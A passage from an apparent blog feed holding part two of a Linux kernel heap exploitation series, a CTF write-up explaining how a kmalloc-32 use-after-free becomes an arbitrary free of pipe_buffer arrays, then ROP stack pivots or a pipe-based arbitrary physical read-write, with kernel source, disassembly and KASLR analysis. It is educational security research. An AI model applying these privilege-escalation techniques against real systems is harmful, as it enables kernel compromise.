<p>[60] https://github.com/heki-linux</p>]]></content><author><name></name></author><summary type="html"><![CDATA[_Note: This is the third post in a series on Linux heap exploitation. It assumes that you have read the first [0] and second part [1]. You can experiment with the exploit [2] yourself using the kernel debugging setup [3] that was published alongside this series.]]></summary></entry><entry><title type="html">Linux S1E2: From UAF in km32 to IP Control or Arbitrary Read-Write</title><link href="https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html" rel="alternate" type="text/html" title="Linux S1E2: From UAF in km32 to IP Control or Arbitrary Read-Write" /><published>2023-08-05T00:00:00+00:00</published><updated>2023-08-05T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/08/05/Linux-S1-E2</id><content type="html" xml:base="https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html"><![CDATA[<p>_Note: This is the second post in a series on Linux heap exploitation. It assumes that you have read the first part [<a href="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html">0</a>]. You can play with the exploit [<a href="https://github.com/vobst/ctf-corjail-public">1</a>] yourself using the kernel debugging setup [<a href="https://github.com/vobst/like-dbg-fork-public">2</a>] published alongside this series.</p>

<p>We concluded the previous post by abusing a use-after-free (UAF) in the kmalloc-32 cache to leak three kernel pointers. Now, we will use those leaks to cause another UAF, this time in the kmalloc-1k cache. By the end of this post, we will have learned how to turn this second, more powerful UAF either into kernel code execution via ROP or into an arbitrary read-write primitive via pipes.</p>

<h2 id="causing-a-more-powerful-uaf">Causing a More Powerful UAF</h2>
<p>At the moment, we have a UAF in kmalloc-32 to play with. However, many standard techniques for constructing code execution or arbitrary read/write primitives require a UAF in a larger cache, e.g., the normal kmalloc-1k cache.</p>

<p>We begin by introducing the ansatz used to create another UAF from a conceptual standpoint before discussing the concrete realization. For starters, suppose that we can allocate a node in some singly linked list on the UAF slot in kmalloc-32, c.f., the figure below (red cross indicates existence of a dangling reference).</p>

<p><img src="/media/Linux-S2/ssl_arb_free_1.jpg" alt="" /></p>

<p>Causing a free of the dangling reference will now allow us to replace the node with another object. If we can control the contents of the reclaiming object, we can fake a list node to include an unsuspecting object at a known address in the list, c.f., the figure below.</p>

<p><img src="/media/Linux-S2/ssl_arb_free_2.jpg" alt="" /></p>

<p>Having read the previous blog post, you might have already guessed what will happen next: we trigger a list cleanup and arbitrarily free the unsuspecting object, i.e., we constructed the primitive to free an arbitrary pointer.</p>

<p>Realizing this idea will again be done by corrupting a <code class="language-plaintext highlighter-rouge">poll_list</code>. First, we must decide which kind of object we would like to free. Recall that we leaked the address of a slot in a kmalloc-1k slab that is currently occupied by a <code class="language-plaintext highlighter-rouge">tty_struct</code>. However, nothing prevents us from allocating another object in its place, and we are going to use this freedom to allocate an array of <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code class="language-plaintext highlighter-rouge">pipe_buffer</code></a> structures at the known address. One such array is allocated whenever a new pipe is created [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/pipe.c#L806">4</a>]. We will elaborate on the semantics of these objects later, for the moment you must trust me that those make them interesting for exploitation. The next figure shows the desired memory transformation, starting from the memory layout we finished with at the end of the previous post.</p>

<p><img src="/media/Linux-S2/trade_tty.jpg" alt="" /></p>

<p><em>Note: Experiments showed an increase in exploit stability when performing this step last. Conceptually this changes nothing, as long as the replacement happens before the pointer is freed, but it might throw you off when reading the code [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/sploit.c#L478">5</a>]. The decrease in stability makes sense as freeing the ttys is a rather noisy operation that, among other things, frees up many slots in the kmalloc-32 slab containing the UAF slot.</em></p>

<p>Next, we are going to free up the UAF slot and allocate a <code class="language-plaintext highlighter-rouge">poll_list</code> node on it. Recall that the slot is currently shared by a <code class="language-plaintext highlighter-rouge">user_key_payload</code> and a <code class="language-plaintext highlighter-rouge">seq_operations</code> structure. Furthermore, we do not know which <code class="language-plaintext highlighter-rouge">seq_operations</code> is occupying the UAF slot, however, we do know which key is corrupted. Thus, we avoid having to free many objects at once by using the key to free up the UAF slot. Spraying another round of <code class="language-plaintext highlighter-rouge">poll_list</code> lists reclaims the slot and leaves us with the following situation in kmalloc-32.</p>

<p><em>Aside: At this point, we meet a potential problem: user keys are freed via a Read Copy Update (RCU) callback [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L128">6</a>]. RCU is a generic technique to improve the performance of shared read-mostly data structures. The idea is that readers enter a so-called RCU read-side critical section before accessing the data structure. While inside this section they are guaranteed that entries they obtain will remain valid, i.e., not be destroyed by someone who is concurrently manipulating the same data structure. This is achieved by delaying the actual destruction of an entry until all preexisting read-side critical sections are finished, i.e., after waiting for the so-called RCU grace period [<a href="https://pdos.csail.mit.edu/6.S081/2022/readings/rcu-decade-later.pdf">7</a>]. Regarding exploitation, this means that there is no point in starting to spray the heap right after an object we want to reclaim has been marked for freeing by RCU. Instead, we want to spray right after the object has been freed. Luckily, there is a system call that does nothing but wait until an RCU grace period has elapsed before returning, and we can use it to synchronize the start of our spray [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/sched/membarrier.c#L470">8</a>] [<a href="https://github.com/lrh2000/StackRot">9</a>].</em></p>

<p><img src="/media/Linux-S2/poll_list_alloc.jpg" alt="" /></p>

<p>Finally, what remains is to replace the <code class="language-plaintext highlighter-rouge">poll_list</code> allocated on the UAF slot with a fake one that points to the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array living in kmalloc-1k. For that purpose, we free all the <code class="language-plaintext highlighter-rouge">seq_operations</code> and use the setxattr technique to write the fake next pointer to the first QWORD of the vacant slots. However, leaving the UAF slot unoccupied for too long is not a good idea as it might lead to double frees, or unpredictable behavior in case the slot is reclaimed by an unrelated object. Thus, we “conserve” the fake pointer by allocating a <code class="language-plaintext highlighter-rouge">user_key_payload</code>, which leaves the first two QWORDs untouched.</p>

<p><img src="/media/Linux-S2/poll_list_arb_free.jpg" alt="" /></p>

<p>Returning from the poll system call will now arbitrarily free a bunch of <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s. This is our more powerful UAF. Thanks for staying with me throughout this tedious sequence of steps. Now I owe you an explanation why it was worth going through this pain.</p>

<p><em>Aside: Some techniques are applicable without this extra sequence of steps. For example, we could trigger the destruction of the slab that contains the UAF slot, causing the backing page to be returned to the Page Allocator. Since the pages backing kmalloc-32 slabs are of order zero, i.e., a kmalloc-32 slab is made of 2^0 pages, it is simple to re-allocate the page as last-level user page tables. Accessing the UAF slot through a dangling pointer will now operate directly on user page table entries, which already sounds like a recipe for disaster. With a little work, this situation can be turned into a strong read-write primitive for physical memory that allows for trivial privilege escalation, e.g., by patching the kernel text [<a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">10</a>] [<a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">11</a>].</em></p>

<h2 id="abusing-fake-c-for-stack-pivots">Abusing Fake C++ for Stack Pivots</h2>

<p>There is a C coding pattern, which can be found in many large code bases, where an instance of a generic structure type might represent one of many more concrete objects. If this reminds you of runtime polymorphism you are well on track. The poster child example in Linux is probably <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L916"><code class="language-plaintext highlighter-rouge">struct file</code></a>. There is one for every open file in the system, and as you probably heard a hundred times, for user space “everything is a file”. This leaves the kernel with a situation where an instance of a <code class="language-plaintext highlighter-rouge">file</code> might represent a hardware timer, a BPF map, a development board, an end of a pipe, a network connection, or … an ordinary file on an ordinary hard disk using an ordinary ext4 filesystem.</p>

<p>To manage this situation, the generic structure has two key fields</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">file</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span>	<span class="o">*</span><span class="n">f_op</span><span class="p">;</span>
    <span class="p">...</span>
	<span class="kt">void</span>			<span class="o">*</span><span class="n">private_data</span><span class="p">;</span>
    <span class="p">...</span>
<span class="p">}</span> <span class="n">__randomize_layout</span>
</code></pre></div></div>
<p>where the first one, i.e., <code class="language-plaintext highlighter-rouge">f_op</code>, is defined as another rather generic struct, this time full of function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">file_operations</span> <span class="p">{</span>
    <span class="p">...</span>
	<span class="kt">ssize_t</span> <span class="p">(</span><span class="o">*</span><span class="n">read</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="p">);</span>
	<span class="kt">ssize_t</span> <span class="p">(</span><span class="o">*</span><span class="n">write</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">mmap</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">open</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</code></pre></div></div>
<p>High-level code, e.g., in the virtual file system layer, will perform the C equivalent of a virtual call to dispatch operations to the lower-level routines that know how to perform them for the given kind of file.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">ssize_t</span> <span class="nf">vfs_read</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">pos</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_op</span><span class="o">-&gt;</span><span class="n">read</span><span class="p">)</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">file</span><span class="o">-&gt;</span><span class="n">f_op</span><span class="o">-&gt;</span><span class="n">read</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">count</span><span class="p">,</span> <span class="n">pos</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p><em>Aside: When reading kernel code those virtual calls are a frequent source of frustration as one oftentimes does not know which handler will be invoked for the object one is interested in. In such situations the rescue comes in the form of my favorite command: <code class="language-plaintext highlighter-rouge">trace-cmd</code> [<a href="https://www.youtube.com/watch?v=JRyrhsx-L5Y">12</a>]. For example, we can use it to easily resolve the read handlers for various kinds of files.</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /proc/sys/kernel/modprobe
cat-4497  [001] 13316.293420: funcgraph_entry:                   |  vfs_read() {
...
cat-4497  [001] 13316.293421: funcgraph_entry:      + 28.696 us  |    proc_sys_read();
cat-4497  [001] 13316.293450: funcgraph_exit:       + 29.772 us  |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /tmp/hax
cat-4519  [009] 13401.049113: funcgraph_entry:                   |  vfs_read() {
...
cat-4519  [009] 13401.049114: funcgraph_entry:        0.444 us   |    shmem_file_read_iter();
cat-4519  [009] 13401.049114: funcgraph_exit:         1.158 us   |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /home/archie/bar
cat-4539  [005] 13493.856387: funcgraph_entry:                   |  vfs_read() {
...
cat-4539  [005] 13493.856389: funcgraph_entry:        0.981 us   |    ext4_file_read_iter();
cat-4539  [005] 13493.856390: funcgraph_exit:         2.857 us   |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /sys/fs/bpf/maps.debug
cat-4364  [004]   221.406352: funcgraph_entry:                   |  vfs_read() {
...
cat-4364  [004]   221.406352: funcgraph_entry:        0.863 us   |    bpf_seq_read();
cat-4364  [004]   221.406353: funcgraph_exit:         1.689 us   |  }
</code></pre></div></div>
<p>The subsystem code that creates the objects will usually set the vtable pointer to a subsystem-internal constant variable that specifies the functions that know how to operate on the file {1}. Furthermore, it usually stores a pointer to an object that holds more specific information in the <code class="language-plaintext highlighter-rouge">private_data</code> member {2}, which makes the information available to the handlers as their parameters always include a pointer to the file object that they were invoked on. Yes, this smells a lot like subclassing.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">pipefifo_fops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="p">.</span><span class="n">read_iter</span>	<span class="o">=</span> <span class="n">pipe_read</span><span class="p">,</span>
	<span class="p">.</span><span class="n">write_iter</span>	<span class="o">=</span> <span class="n">pipe_write</span><span class="p">,</span>
	<span class="p">...</span>
<span class="p">};</span>

<span class="kt">int</span> <span class="nf">create_pipe_files</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">**</span><span class="n">res</span><span class="p">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span> <span class="o">=</span> <span class="n">get_pipe_inode</span><span class="p">();</span>
	<span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">f</span> <span class="o">=</span> <span class="n">alloc_file_pseudo</span><span class="p">(</span><span class="n">inode</span><span class="p">,</span> <span class="n">pipe_mnt</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span>
				<span class="n">O_WRONLY</span> <span class="o">|</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="p">(</span><span class="n">O_NONBLOCK</span> <span class="o">|</span> <span class="n">O_DIRECT</span><span class="p">)),</span>
				<span class="o">&amp;</span><span class="n">pipefifo_fops</span><span class="p">);</span> <span class="c1">// {1}, sets f-&gt;f_op = &amp;pipefifo_fops</span>
	<span class="p">...</span>
	<span class="n">f</span><span class="o">-&gt;</span><span class="n">private_data</span> <span class="o">=</span> <span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_pipe</span><span class="p">;</span> <span class="c1">// {2}, struct pipe_inode_info *</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Okay, but why care about object-oriented ideas in a programming language more than twice my age? We care because essentially all kernel exploits that gain code execution do so by corrupting an object that has a vtable with the intention of hijacking a virtual call. The idea is relatively straightforward: arbitrarily free an object at a known address and replace it with user-controlled data. The fake object’s vtable will point back into the controlled data, where the virtual call will finally find the address of a stack pivot gadget. Pivoting the stack into controlled data is feasible as at least the register providing the ‘self’ argument must point to the corrupted object, however, usually more registers will contain useful values.</p>

<p><img src="/media/Linux-S2/sp_idea.jpg" alt="" /></p>

<p>There are a few properties that we would like the victim object to have:</p>
<ol>
  <li>Faking it should be easy. If the object is used in complicated ways before the virtual call happens the bar of creating a convincing fake rises, which we want to avoid as we are lazy.</li>
  <li>Pivoting should be easy. At the point where we take instruction pointer (IP) control the CPU registers should be full of pointer into controlled data such that we do not have to spend ages looking for ROP/JOP gadgets.</li>
  <li>Reclaiming it should be easy. While it is possible to reclaim objects across cache boundaries by taking a detour to the Page Allocator, it is better if the victim object is allocated in the same cache as an easily sprayable user data container.
Luckily, our array of <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s meets all those requirements.</li>
</ol>

<p>When the last reference to a pipe is released, it will be destroyed. During that process, the code will eventually iterate over all <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s and call their destructors. This is where we will take IP control.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">free_pipe_info</span><span class="p">(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="n">pipe</span><span class="p">)</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">pipe</span><span class="o">-&gt;</span><span class="n">ring_size</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">pipe</span><span class="o">-&gt;</span><span class="n">bufs</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// dangling pointer</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">)</span> <span class="c1">// {1}</span>
            <span class="n">pipe_buf_release</span><span class="p">(</span><span class="n">pipe</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="p">...</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">pipe_buf_release</span><span class="p">(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="n">pipe</span><span class="p">,</span>
                                    <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
    <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="c1">// `buf` points into our data and we control value of `ops`</span>
    <span class="n">ops</span><span class="o">-&gt;</span><span class="n">release</span><span class="p">(</span><span class="n">pipe</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Crafting our payload, however, requires examining what the compiler made of that code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov	rcx, qword ptr [rbx + 152]          # rcx = pipe-&gt;bufs
movsxd	rdx, ebp
lea	rsi, [rdx + 4*rdx]
mov	rdx, qword ptr [rcx + 8*rsi + 16]   # rdx = (pipe-&gt;bufs+i)-&gt;ops
test	rdx, rdx
je	0xffffffff812f0d9f &lt;free_pipe_info+0x2f&gt;
lea	rax, [rcx + 8*rsi]
add	rax, 16                             # rax = &amp;(pipe-&gt;bufs+i)-&gt;ops
lea	rsi, [rcx + 8*rsi]                  # rsi = pipe-&gt;bufs+i
mov	qword ptr [rax], 0
mov	r11, qword ptr [rdx + 8]            # r11 =(pipe-&gt;bufs+i)-&gt;ops-&gt;release
mov	rdi, rbx
call	0xffffffff81e02300 &lt;__x86_indirect_thunk_r11&gt; # retpoline "call r11"
</code></pre></div></div>
<p>As we can see in the above listing, <code class="language-plaintext highlighter-rouge">rcx</code>, <code class="language-plaintext highlighter-rouge">rdx</code>, <code class="language-plaintext highlighter-rouge">rax</code>, and <code class="language-plaintext highlighter-rouge">rsi</code> hold interesting values. Equipped with that knowledge we can start crafting our ROP payload. Since we allocate our data as <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects we must not forget to account for the structure header, which is unfortunately not under our control. Consequently, a naive overlay would result in the <code class="language-plaintext highlighter-rouge">len</code> field overlapping with the first buffer’s <code class="language-plaintext highlighter-rouge">ops</code> field, making the condition {1} pass on an uncontrolled value. However, as the SLUB allocator performs only limited alignment checks on allocations and frees, we can adjust the relative position by performing a misaligned free, causing the loop to skip the first buffer.</p>

<p><img src="/media/Linux-S2/pivot_on_pipe.jpg" alt="" /></p>

<p>The first gadget pivots the stack to the first QWORD of controlled data, while the second one skips over the part that was used to pivot the stack and leaves us at the start of the ROP chain responsible for privilege escalation.</p>

<p>Doing kernel ROP sounds cool, but in practice, it has several drawbacks that make it unattractive. For example, portability is hampered by the need to manually search for new ROP gadgets and control flow integrity (CFI) might make life harder on some platforms. Therefore, we will now discuss how to construct a primitive that will allow for a data-only privilege escalation.</p>

<p><em>Aside: While crafting my first kernel ROP chain I noticed that some things are different from in user land exploitation. Let me elaborate on two of them here. First, the kernel is a self-modifying program. Thus, what you get when disassembling the image’s text section is not what you will find in executable memory at runtime. Fortunately, I read about this before it first happened to me, and thus I quickly figured out what was going on [<a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">13</a>]. Be advised to dump the executable mappings at runtime and use them as input for ROP gadget finders. The second thing is already visible in the assembly listing above, but it took me way longer to figure it out. In fact, I have not read it anywhere yet. To mitigate against spectre family attacks, the kernel might use so-called retpolines when performing indirect control flow transfers [<a href="https://support.google.com/faqs/answer/7625886">14</a>]. Retpolines are semantically equivalent to <code class="language-plaintext highlighter-rouge">jmp REG</code> or <code class="language-plaintext highlighter-rouge">call REG</code> operations, which makes them interesting for building ROP chains, but manifest themselves as calls to fixed addresses in the disassembly. As I am used to discarding gadgets that end in calls to fixed addresses when building user land ROP chains this oversight led to me missing many potentially useful gadgets.</em></p>

<h2 id="abusing-s-for-arbitrary-read-and-write">Abusing |’s for Arbitrary Read and Write</h2>
<p>Despite using pipelines in every second shell command, it was not until exploring the Dirty Pipe vulnerability that I had a look into their implementation [<a href="https://dirtypipe.cm4all.com/">15</a>] [<a href="https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/">16</a>]. In essence, a pipe is a circular, in-kernel buffer that can be read from and written to by user space through file descriptors. For example, when executing a pipeline, the parent shell creates a pipe and hands the disparate ends to the subshells that execute the commands, which use it to connect their stdin and stdout streams.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strace -e pipe2,dup2 -f sh -c "cat /tmp/hax | cat"
pipe2([3, 4], 0)                       = 0
strace: Process 4975 attached
[pid 4975] dup2(4, 1)                 = 1
strace: Process 4976 attached
[pid 4976] dup2(3, 0)                 = 0
</code></pre></div></div>
<p>For each pipe, the kernel maintains a <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L58"><code class="language-plaintext highlighter-rouge">pipe_inode_info</code></a> structure that, among other things, tracks the positions in the circular buffer that data will be read from or written to the next time user space interacts with the pipe. The next figure shows a partially filled pipe.</p>

<p><img src="/media/Linux-S2/pipe_simple.jpg" alt="" /></p>

<p>However, the above picture is grossly oversimplified, and understanding the exploitation technique requires digging a bit deeper into the implementation. In particular, the circular buffer is realized through multiple non-contiguous pages of memory, each of which is managed by a <code class="language-plaintext highlighter-rouge">pipe_buffer</code> structure. The <code class="language-plaintext highlighter-rouge">pipe_buffer</code> contains a pointer to the <code class="language-plaintext highlighter-rouge">page</code> describing the underlying memory, as well as the offset and length of the user data currently stored on the page. As we can see in the next figure, this indirection allows minimizing the pipe’s memory footprint.</p>

<p><img src="/media/Linux-S2/pipe_semi_simple.jpg" alt="" /></p>

<p>Finally, we need to make one last adjustment to our mental picture, namely that the kernel stores the <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s in a heap-allocated array, a pointer to which is kept in the <code class="language-plaintext highlighter-rouge">bufs</code> member of <code class="language-plaintext highlighter-rouge">pipe_inode_info</code>. The integers <code class="language-plaintext highlighter-rouge">head</code> and <code class="language-plaintext highlighter-rouge">tail</code> are indices into this array, and circularity is implemented by masking them with the array length, aka. <code class="language-plaintext highlighter-rouge">ring_size</code>, which is a power of two, minus one before each access. It is exactly an array of this kind that we arbitrarily freed earlier.</p>

<p><img src="/media/Linux-S2/pipe_sufficient.jpg" alt="" /></p>

<p>Given that background, there is not much creativity involved in devising a way to abuse the UAF to create an arbitrary read-write primitive. By setting the <code class="language-plaintext highlighter-rouge">page</code>, <code class="language-plaintext highlighter-rouge">offset</code>, and <code class="language-plaintext highlighter-rouge">len</code> fields of the <code class="language-plaintext highlighter-rouge">tail</code> buffer before performing an i/o operation on the pipe, we can read from or write to arbitrary RAM-backed physical addresses.</p>

<p><img src="/media/Linux-S2/pipe_rw_idea.jpg" alt="" /></p>

<p>The conversion between physical, virtual, and <code class="language-plaintext highlighter-rouge">page</code> addresses required for this technique involves two distinct regions in the kernel’s virtual memory space: the direct map and the vmemmap region. The former is, as the name suggests, a direct map of all physical memory of the system, while the latter is an array of <code class="language-plaintext highlighter-rouge">page</code> structures describing this memory, c.f., the figure below for a simplified illustration.</p>

<p><img src="/media/Linux-S2/mm_overview.jpg" alt="" /></p>

<p>Until now, it was sufficient to corrupt the arbitrarily freed object once, e.g., to replace it with a fake object for stack pivoting. However, we plan to scan substantial amounts of physical memory, and thus we need to be able to edit the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array repeatedly. Performing thousands of free and reclaim races sounds like an excellent recipe for crashing the kernel. Thus, another approach is needed. Ideally, we want a user data container without any headers whose contents we can update without reallocating it. Luckily, tty write buffers give us just that primitive [<a href="https://github.com/0xkol/badspin">17</a>].</p>

<p><em>Aside: There is another way to solve this problem by using a second pipe. The first pipe is corrupted once such that the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> at <code class="language-plaintext highlighter-rouge">tail</code> references the page containing the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array. Then, we splice the whole buffer into a second pipe. Now, the catch is that pipes keep one scratch page for performance reasons, and through careful manipulation of the second pipe we can make sure that its scratch page is always the one containing the first pipe’s buffer array [<a href="https://www.interruptlabs.co.uk/articles/pipe-buffer">18</a>].</em></p>

<p><em>Aside: Besides the <code class="language-plaintext highlighter-rouge">page</code>, <code class="language-plaintext highlighter-rouge">offset</code>, and <code class="language-plaintext highlighter-rouge">len</code> members, there is one more thing we need to initialize in the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> if we want to use it for writing: the <code class="language-plaintext highlighter-rouge">flags</code>. In particular, we need to set the <code class="language-plaintext highlighter-rouge">PIPE_BUF_FLAG_CAN_MERGE</code> flag to indicate that it is okay to “append” subsequent writes to this buffer. Yes, that is the flag that caused all the Dirty Pipe trouble and I still forgot to initialize it.</em></p>

<p><em>Aside: After our sprays we will own plenty of pipes and ttys, however, we do not know which pipe is corrupted and which tty is responsible for it. We can use the <code class="language-plaintext highlighter-rouge">FIONREAD</code> ioctl on the pipe, which returns the number of bytes that can be read from it, together with unique write buffer payloads to figure out the pairing [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c#L77">19</a>].</em></p>

<h3 id="kernel-address-space-layout-randomization-kaslr-revisited">Kernel Address Space Layout Randomization (KASLR) Revisited</h3>

<p>Before we can proceed, we need to take a step back and take a closer look at the leaks we collected in the previous blog post.</p>

<p>Recall that we leaked a pointer to a <code class="language-plaintext highlighter-rouge">page</code> as well as a pointer to a heap-allocated <code class="language-plaintext highlighter-rouge">tty_struct</code>. The former points into the kernel’s vmemmap-region, while the latter points into a RAM-backed section of the kernel’s direct map, also known as page-offset, region, which maps all of physical memory [<a href="https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html">20</a>].</p>

<p>Both regions are randomized independently at kernel startup with a granularity of one GiB, which is the size of memory covered by a Page Upper Directory (PUD) entry [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64">21</a>]. Due to constraints on the layout of virtual memory, the entropy of the randomization is about 15 bits according to a comment by the developers. Furthermore, the region’s ordering must remain unchanged. Note that the randomized regions may start above <em>or below</em> their nonrandomized base addresses, which are <code class="language-plaintext highlighter-rouge">0xffffea0000000000</code> and <code class="language-plaintext highlighter-rouge">0xffff888000000000</code>, respectively [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64">21</a>].</p>

<p>Without further assumptions, it is only possible to extract the base address of a memory region from a valid pointer if we know that the pointer’s base offset cannot be larger than the randomization granularity. This immediately implies that, in the general case, it is not possible to extract the <code class="language-plaintext highlighter-rouge">page_offset_base</code> from a valid pointer into the direct map. At least on systems with more than one GiB of RAM.</p>

<p>However, for the leaked <code class="language-plaintext highlighter-rouge">page</code> pointer the situation is less certain. As the size of <code class="language-plaintext highlighter-rouge">struct page</code> is 64 bytes, a vmemmap region of size one GiB can describe 64 GiB of physical memory. On my laptop with 32 GiB of RAM, for example, the size of the physical memory space is 34 GiB, which would make every valid page pointer splittable into the Page Frame Number (PFN) and the <code class="language-plaintext highlighter-rouge">vmemmap_base</code>.</p>

